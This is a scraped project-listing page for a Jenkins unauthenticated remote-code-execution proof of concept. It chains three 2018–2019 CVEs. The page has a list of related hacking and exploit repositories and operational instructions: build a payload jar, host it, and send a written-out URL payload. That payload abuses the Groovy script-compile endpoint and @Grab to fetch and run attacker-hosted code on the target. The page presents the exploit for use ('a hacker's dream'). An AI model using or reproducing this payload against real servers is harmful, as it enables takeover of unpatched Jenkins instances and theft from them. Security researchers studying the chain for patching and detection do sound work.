All Projects → petercunha → Jenkins Rce

petercunha / Jenkins Rce

😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!

Programming Languages

java
68154 projects - #9 most used programming language

Projects that are alternatives of or similar to Jenkins Rce

Pwn jenkins
Notes about attacking Jenkins servers
Stars: ✭ 841 (+220.99%)
Mutual labels:  hacking, exploit, rce, jenkins
Cve 2019 1003000 Jenkins Rce Poc
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
Stars: ✭ 270 (+3.05%)
Mutual labels:  exploit, rce, jenkins
Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (-66.79%)
Mutual labels:  hacking, exploit, rce
Ctf All In One
CTF竞赛权威指南
Stars: ✭ 2,807 (+971.37%)
Mutual labels:  hacking, exploit
Jsshell
JSshell - JavaScript reverse/remote shell
Stars: ✭ 167 (-36.26%)
Mutual labels:  hacking, exploit
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (-29.01%)
Mutual labels:  hacking, exploit
Awesome Hacking Resources
A collection of hacking / penetration testing resources to make you better!
Stars: ✭ 11,466 (+4276.34%)
Mutual labels:  hacking, exploit
Dccwbypassuac
Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe".
Stars: ✭ 227 (-13.36%)
Mutual labels:  hacking, exploit
Netelf
Run executables from memory, over the network, on Windows, Linux, OpenVMS... routers... spaceships... toasters etc.
Stars: ✭ 220 (-16.03%)
Mutual labels:  hacking, rce
Icg Autoexploiterbot
Wordpress 🔥 Joomla 🔥 Drupal 🔥 OsCommerce 🔥 Prestashop 🔥 Opencart 🔥
Stars: ✭ 242 (-7.63%)
Mutual labels:  hacking, exploit
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-92.37%)
Mutual labels:  exploit, rce
Adbsploit
A python based tool for exploiting and managing Android devices via ADB
Stars: ✭ 147 (-43.89%)
Mutual labels:  hacking, exploit
Oxidtools
200 TOOLS BY 0XID4FF0X FOR TERMUX
Stars: ✭ 143 (-45.42%)
Mutual labels:  hacking, exploit
Ladon
大型内网渗透扫描器&Cobalt Strike,Ladon8.9内置120个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),远程执行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降权提权Runas、GetSystem,Poc/Exploit,支持Cobalt Strike 3.X-4.0
Stars: ✭ 2,911 (+1011.07%)
Mutual labels:  hacking, exploit
Entropy
Entropy Toolkit is a set of tools to provide Netwave and GoAhead IP webcams attacks. Entropy Toolkit is a powerful toolkit for webcams penetration testing.
Stars: ✭ 126 (-51.91%)
Mutual labels:  hacking, exploit
Lost Nds Tv
The Lost Nintendo DS Television Output, brought back to life
Stars: ✭ 221 (-15.65%)
Mutual labels:  hacking, exploit
exploit-CVE-2015-3306
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container
Stars: ✭ 97 (-62.98%)
Mutual labels:  exploit, rce
PwnX.py
🏴‍☠️ Pwn misconfigured sites running ShareX custom image uploader API through chained exploit
Stars: ✭ 30 (-88.55%)
Mutual labels:  exploit, rce
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-67.94%)
Mutual labels:  exploit, rce
Oscp Prep
my oscp prep collection
Stars: ✭ 105 (-59.92%)
Mutual labels:  hacking, exploit

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Read his write-ups on this exploit here - Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html His github: https://github.com/orangetw

INSTRUCTIONS:

  • Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
  • Once that is finished, copy the inner contents of www/ to a webserver.
  • In the URL payload, replace with the hostname of the server, and to the hostname of where you uploaded your files.

URL Payload:

http:///securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='payload', root='http://')%0a @Grab(group='package', module='payload', version='1')%0a import Payload;

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].